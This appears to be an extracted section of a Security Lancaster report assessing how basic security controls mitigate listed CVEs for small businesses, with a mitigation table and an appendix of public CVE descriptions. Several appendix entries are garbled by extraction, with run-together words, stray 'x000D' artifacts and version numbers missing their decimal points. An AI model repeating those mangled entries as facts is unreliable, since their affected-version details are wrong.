CVE-2014-0577 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Access Control
CVE-2014-0765 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0767 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-0783 | n | n | n | n | n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Port closing)
CVE-2014-1330 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1342 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Website Blacklisting
CVE-2014-1349 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Firewall, Access Control
CVE-2014-1356 | y | y | y | y | y | Not Mitigated | Mitigated - Secure Configuration, Malware Protection, Patch Management
CVE-2014-1370 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | y | y | y | y | y | Not Mitigated | Mitigated - Malware Protection, Patch Management
CVE-2014-1379 | n | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-1382 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1466 | y | n | n | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-1472 | y | n | n | n | n | Not Mitigated | Mitigated - Website Blacklist, Patch Management
CVE-2014-1477 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1518 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1563 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1565 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1586 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1701 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-1740 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1744 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1753 | y | n | y | y | y | Not Mitigated | Mitigated - Website Blacklisting & Patch Management
CVE-2014-1806 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-1808 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall, Website Blacklisting & Patch Management
CVE-2014-1811 | y | y | y | y | y | Not Mitigated | Mitigated - Firewall
CVE-2014-1812 | y | y | y | y | y | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-2014 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-2103 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2109 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2364 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2416 | n | y | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-2554 | n | n | y | n | n | Not Mitigated | Mitigated - Patch Management, Access Control, Website Blacklisting
CVE-2014-2643 | n | y | n | n | n | Not Mitigated | Mitigated - Patch Management, Strong Passwords (User Access)
CVE-2014-2742 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti DOS
CVE-2014-2768 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2789 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2791 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2794 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2808 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-2821 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-3444 | n | n | n | y | n | Not Mitigated | Mitigated - Anti-Malware, Patch Management
CVE-2014-3489 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3507 | n | n | y | y | y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-3556 | y | n | y | n | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-3580 | y | y | y | n | n | Not Mitigated | Mitigated - Firewall Anti DOS, Patch Management
CVE-2014-3814 | n | n | n | n | n | Not Mitigated | Mitigated - Strong Passwords (User Access)
CVE-2014-3819 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-3872 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration & Patch Management
CVE-2014-4044 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4079 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4082 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4100 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4105 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4114 | y | y | y | y | n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-4127 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4130 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4132 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4133 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE | SME1 | SME2 | SME3 | SME4 | Idealised | No CE | With CE
CVE-2014-4141 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-4481 | y | y | y | y | y | Not Mitigated | Mitigated - Patch Management, Anti-Malware
CVE-2014-4617 | y | y | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-4631 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2014-6040 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-6105 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6136 | n | n | n | n | n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2014-6363 | y | n | y | y | n | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6369 | y | n | y | y |  | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-6378 | n | n | n | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-6487 | n | n | y | n | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-7250 | n | y | y | n | n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2014-7927 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall, Secure Configuration (Access Control), Patch Management
CVE-2014-7945 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-8447 | y | y | y | y | n | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management
CVE-2014-8638 | y | y | y | y | y | Not Mitigated | Mitigated - Website Blacklisting, Secure Configuration (Secure Browser), Patch Management
CVE-2014-8835 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-9159 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9163 | y | y | y | y | y | Not Mitigated | Partially Mitigated - Anti-Malware, Patch Management [Time Delay]
CVE-2014-9350 | y | y | y | y | n | Not Mitigated | Mitigated - Firewall Anti-Dos, Firmware Updates
CVE-2014-9357 | n | n | n | n | n | Not Mitigated | Partially Mitigated - Patch Management, Anti-Malware, Secure Configuration
CVE Details

CVE-2013-0008: win32k.sys in the kernel-mode drivers in Microsoft Windows Vista SP2, Windows Server 2008 SP2, R2, and R2 SP1, Windows 7 Gold and SP1, Windows 8, Windows Server 2012, and Windows RT does not properly handle window broadcast messages, which allows local users to gain privileges via a crafted application, aka "Win32k Improper Message Handling Vulnerability."

CVE-2013-0022: Use-after-free vulnerability in Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer LsGetTrailInfo Use After Free Vulnerability."

CVE-2013-0084: Directory traversal vulnerability in Microsoft SharePoint Server 2010 SP1 and SharePoint Foundation 2010 SP1 allows remote attackers to bypass intended read restrictions for content, and hijack user accounts, via a crafted URL, aka "SharePoint Directory Traversal Vulnerability."

CVE-2013-0140: SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 4.5.7 and 4.6.x before 4.6.6 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149: The OSPF implementation in Cisco IOS 12.0 through 12.4 and 15.0 through 15.3, IOS-XE 2.x through 3.9.xS, ASA and PIX 7.x through 9.1, FWSM, NX-OS, and StarOS before 14.0.50488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172: Samba 4.0.x before 4.0.1, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174: The external node classifier (ENC) API in Foreman before 1.1 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199: The default LDAP ACIs in FreeIPA 3.0 before 3.1.2 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253: The default configuration of Apache Maven 3.0.4, when using Maven Wagon 2.1, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270: OpenStack Keystone Grizzly before 2013.1, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481: The console in IBM Sterling B2B Integrator 5.1 and 5.2 and Sterling File Gateway 2.1 and 2.2 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598: Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 7.1 before 7.1.2.12, 8.0 before 8.0.0.8, and 8.0.1 before 8.0.1.1 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619: Adobe Reader and Acrobat 9.x before 9.5.3, 10.x before 10.1.5, and 11.x before 11.0.1 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633: Buffer overflow in Adobe Flash Player before 10.3.183.51 and 11.x before 11.5.502.149 on Windows and Mac OS X, before 10.3.183.51 and 11.x before 11.2.202.262 on Linux, before 11.1.111.32 on Android 2.x and 3.x, and before 11.1.115.37 on Android 4.x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649: Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644.
and CVE-2013-1374
CVE-2013-0746Mozilla Firefox before 180 Firefox ESR10x before 10012 and 17x x000Dbefore 1702 Thunderbird before 1702Thunderbird ESR 10x before x000D10012 and 17x before 1702 andSeaMonkey before 215 do not x000Dproperly implement quickstubs that usethe jsval data type for their x000D returnvalues which allows remote attackers toexecute arbitrary code x000D or cause adenial of service (compartment mismatchand application x000D crash) via craftedJavaScript code that is not properly handledduring x000D garbage collection
CVE-2013-0753Use-after-free vulnerability in theserializeToStream implementation x000Din the XMLSerializer component in MozillaFirefox before 180 Firefox x000D ESR10x before 10012 and 17x before1702 Thunderbird before x000D 1702Thunderbird ESR 10x before 10012 and17x before 1702 x000D and SeaMonkeybefore 215 allows remote attackers toexecute arbitrary x000D code via craftedweb content
CVE-2013-0787Use-after-free vulnerability in thensEditorIsPreformatted function x000Din editorlibeditorbasensEditorcppin Mozilla Firefox before x000D1902 Firefox ESR 17x before 1704Thunderbird before 1704 x000DThunderbird ESR 17x before 1704 andSeaMonkey before 2161 allows x000Dremote attackers to execute arbitrarycode via vectors involving an x000DexecCommand call
CVE-2013-0909The XSS Auditor in Google Chrome before2501364152 allows remote attackers toobtain sensitive HTTP Referer informationvia unspecified vectors
CVE-2013-1035The iTunes ActiveX control in Apple iTunesbefore 111 allows remote x000D attackersto execute arbitrary code or cause a denialof service x000D (memory corruption) viaa crafted web site
CVE-2013-1102The Wireless Intrusion Prevention System(wIPS) component on Cisco x000DWireless LAN Controller (WLC) deviceswith software 70 before x000D 70235071 and 72 before 721100 and 73before 731010 x000D allows remoteattackers to cause a denial of service(device reload) x000D via crafted IPpackets aka Bug ID CSCtx80743
CVE-2013-1140The XML parser in Cisco SecurityMonitoring Analysis and Response x000DSystem (MARS) allows remote attackers toread arbitrary files via an x000D externalentity declaration in conjunction with anentity reference x000D related to an XMLExternal Entity (XXE) issue aka Bug IDCSCue55093
CYBER SECURITY CONTROLS EFFECTIVENESS — Security Lancaster, Page 19 of 28
CVE-2013-1144: Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.
CVE-2013-1153: Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.
CVE-2013-1181: Cisco NX-OS on Nexus 5500 devices 4.x and 5.x before 5.0(3)N2(2), Nexus 3000 devices 5.x before 5.0(3)U3(2), and Unified Computing System (UCS) 6200 devices before 2.0(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.
CVE-2013-1303: Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability", a different vulnerability than CVE-2013-1304 and CVE-2013-1338.
CVE-2013-1384: Adobe Shockwave Player before 12.0.2.122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.
CVE-2013-1388: Unspecified vulnerability in Adobe ColdFusion 9.0 before Update 10, 9.0.1 before Update 9, 9.0.2 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.
CVE-2013-1450: Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.
CVE-2013-1472: Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 2.2.4 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.
CVE-2013-1553: Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 11.1.1.6.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.
CVE-2013-1620: The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.
CVE-2013-1627: Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 7.0 and earlier and Advantech Studio 7.0 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.
CVE-2013-1638: Opera before 12.13 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.
CVE-2013-1669: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 21.0 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.
CVE-2013-1676: The SelectionIterator::GetNextSegment function in Mozilla Firefox before 21.0, Firefox ESR 17.x before 17.0.6, Thunderbird before 17.0.6, and Thunderbird ESR 17.x before 17.0.6 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.
CVE-2013-1700: The Mozilla Maintenance Service in Mozilla Firefox before 22.0 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.
CVE-2013-1734: Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2.x, 3.x, and 4.0.x before 4.0.11; 4.1.x and 4.2.x before 4.2.7; and 4.3.x and 4.4.x before 4.4.1 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.
CVE-2013-1777: The JMX Remoting functionality in Apache Geronimo 3.x before 3.0.1, as used in IBM WebSphere Application Server (WAS) Community Edition 3.0.0.3 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.
CVE-2013-2319: FileMaker Pro before 12 and Pro Advanced before 12 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2013-2340: Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.
CVE-2013-2350: Unspecified vulnerability in HP Storage Data Protector 6.2X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.
CVE-2013-2492: Stack-based buffer overflow in Firebird 2.1.3 through 2.1.5 before 18514, and 2.5.1 through 2.5.3 before 26623, on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.
CVE-2013-2507: Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (1.03) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.
CVE-2013-2736: Adobe Reader and Acrobat 9.x before 9.5.5, 10.x before 10.1.7, and 11.x before 11.0.03 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.
CVE-2013-2780: Siemens SIMATIC S7-1200 PLCs 2.x and 3.x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).
CVE-2013-2803: ProSoft RadioLinx ControlScape before 6.00.040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.
CVE-2013-2824: Schneider Electric StruxureWare SCADA Expert Vijeo Citect 7.40, Vijeo Citect 7.20 through 7.30SP1, CitectSCADA 7.20 through 7.30SP1, StruxureWare PowerSCADA Expert 7.30 through 7.30SR1, and PowerLogic SCADA 7.20 through 7.20SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.
CVE-2013-2826: WellinTech KingSCADA before 3.1.2, KingAlarm&Event before 3.1, and KingGraphic before 3.1.2 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.
CVE-2013-2920: The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 30.0.1599.66 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.
CVE-2013-3064: Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1.1.28.147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.
CVE-2013-3116: Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3137: Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability".
CVE-2013-3194: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3199: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3201: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3206: Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209.
CVE-2013-3280: EMC RSA Authentication Agent 7.1.x before 7.1.2 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.
CVE-2013-3387: Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 8.6 and 9.x before 9.2(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.
CVE-2013-3417: The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.
CVE-2013-3632: The Cron service in rpc.php in OpenMediaVault allows remote authenticated users to execute cron jobs as arbitrary users and execute arbitrary commands via the username parameter.
CVE-2013-3656: Cybozu Office 9.1.0 and earlier does not properly manage sessions, which allows remote attackers to bypass authentication by leveraging knowledge of a login URL.
CVE-2013-3856: Microsoft Word 2003 SP3 and Word Viewer allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability".
CVE-2013-3860: Microsoft .NET Framework 2.0 SP2, 3.5, 3.5 SP1, 3.5.1, 4, and 4.5 does not properly parse a DTD during XML digital-signature validation, which allows remote attackers to cause a denial of service (application crash or hang) via a crafted signed XML document, aka "Entity Expansion Vulnerability".
CVE-2013-3893: Use-after-free vulnerability in the SetMouseCapture implementation in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code via crafted JavaScript strings, as demonstrated by use of an ms-help: URL that triggers loading of hxds.dll.
CVE-2013-3897: Use-after-free vulnerability in the CDisplayPointer class in mshtml.dll in Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted JavaScript code that uses the onpropertychange event handler, as exploited in the wild in September and October 2013, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2013-3900: The WinVerifyTrust function in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 does not properly validate PE file digests during Authenticode signature verification, which allows remote attackers to execute arbitrary code via a crafted PE file, aka "WinVerifyTrust Signature Validation Vulnerability".
CVE-2013-3905: Microsoft Outlook 2007 SP3, 2010 SP1 and SP2, 2013, and 2013 RT does not properly expand metadata contained in S/MIME certificates, which allows remote attackers to obtain sensitive network configuration and state information via a crafted certificate in an e-mail message, aka "S/MIME AIA Vulnerability".
CVE-2013-4223: The Gentoo Nullmailer package before 1.11-r2 uses world-readable permissions for /etc/nullmailer/remotes, which allows local users to obtain SMTP authentication credentials by reading the file.
CVE-2013-4436: The default configuration for salt-ssh in Salt (aka SaltStack) 0.17.0 does not validate the SSH host key of requests, which allows remote attackers to have unspecified impact via a man-in-the-middle (MITM) attack.
CVE-2013-4478: Sup before 0.13.2.1 and 0.14.x before 0.14.1.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the filename of an email attachment.
CVE-2013-4529: Buffer overflow in hw/pci/pcie_aer.c in QEMU before 1.7.2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a large log_num value in a savevm image.
CVE-2013-4555: Cross-site request forgery (CSRF) vulnerability in ecrire/action/logout.php in SPIP before 2.1.24 allows remote attackers to hijack the authentication of arbitrary users for requests that logout the user via unspecified vectors.
CVE-2013-4776: NETGEAR ProSafe GS724Tv3 and GS716Tv2 with firmware 5.4.1.13 and earlier, GS748Tv4 5.4.1.14, and GS510TP 5.0.4.4 allows remote attackers to cause a denial of service (reboot or crash) via a crafted HTTP request to filesystem/.
CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.
CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability".
CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.
CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.
CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.
CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.
CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.
CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.
CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.
CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.
CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.
CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.
